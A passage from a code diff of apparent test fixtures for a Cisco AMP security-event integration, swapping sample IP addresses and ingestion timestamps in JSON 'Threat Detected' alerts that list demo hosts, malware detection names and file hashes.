Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337153900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":821000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261640\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1733,7 +1733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1792,7 +1792,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1809,8 +1809,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174551390Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "ingested": "2021-12-09T13:35:36.337159700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261639\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1832,7 +1832,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -1883,7 +1883,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1897,8 +1897,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174553415Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337165500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261638\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1920,7 +1920,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1979,7 +1979,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1996,8 +1996,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174555596Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", + "ingested": "2021-12-09T13:35:36.337170800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":680000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261637\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":2712,\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2019,7 +2019,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2070,7 +2070,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2084,8 +2084,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174557637Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337174700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":665000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261636\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2107,7 +2107,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2166,7 +2166,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2183,8 +2183,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174559708Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", + "ingested": "2021-12-09T13:35:36.337179600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251503560262000,\"timestamp\":1610705856,\"timestamp_nanoseconds\":509000000,\"date\":\"2021-01-15T10:17:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"detection_id\":\"6159251503560261635\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"t.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\t.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2206,7 +2206,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2257,7 +2257,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2267,8 +2267,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174561746Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337185500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259028591575000,\"timestamp\":1610705845,\"timestamp_nanoseconds\":984000000,\"date\":\"2021-01-15T10:17:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259028591575130\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2290,7 +2290,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2349,7 +2349,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2366,8 +2366,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174563786Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251439135752000,\"timestamp\":1610705841,\"timestamp_nanoseconds\":455000000,\"date\":\"2021-01-15T10:17:21+00:00\",\"event_type\":\"Threat 